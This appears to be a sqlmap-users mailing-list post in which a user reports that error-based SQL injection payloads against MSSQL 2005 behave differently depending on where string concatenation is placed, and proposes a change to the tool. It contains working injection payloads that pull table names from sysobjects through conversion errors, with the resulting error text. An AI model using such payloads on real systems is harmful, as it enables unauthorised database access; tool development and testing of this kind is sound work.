Hey,
I'm using the error-based technique for extracting data from an MSSQL server
(2005 - 9.00.4053.00). It seems like concating the sub-query with a string
doesn't work well - for some reason, the webserver returns the regular
response for row not found instead of throwing an error.
I tested it manually and found the following:
- ') AND 3792=CONVERT(INT,(SELECT TOP 1 name FROM sysobjects WHERE xtype
= 'U')) -- - Works well - throws an error with a table name ("Conversion
failed when converting the nvarchar value 'TABLE-NAME' to data type int.
")
- ') AND 3792=CONVERT(INT,(SELECT TOP 1 'x:' + name FROM sysobjects WHERE
xtype = 'U')) -- - Works well - throws an error with a table name
("Conversion
failed when converting the nvarchar value 'x:TABLE-NAME' to data type int.
")
- ') AND 3792=CONVERT(INT,'x:'+(SELECT TOP 1 name FROM sysobjects WHERE
xtype = 'U')) -- - Doesn't work - just returns 'page not found' (not an
404 error, an error from the script telling that no rows were found)
Can anyone test and confirm this? I'm not quite sure why that happens, but
it seems like it can easily be fixed by adding the strings inside the
sub-query (SELECT ':foo'+...+':bar:') instead of outside of it as it does
now.
Thanks
------------------------------------------------------------------------------
WhatsUp Gold - Download Free Network Management Software
The most intuitive, comprehensive, and cost-effective network
management toolset available today. Delivers lowest initial
acquisition cost and overall TCO of any competing solution.
http://p.sf.net/sfu/whatsupgold-sd
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
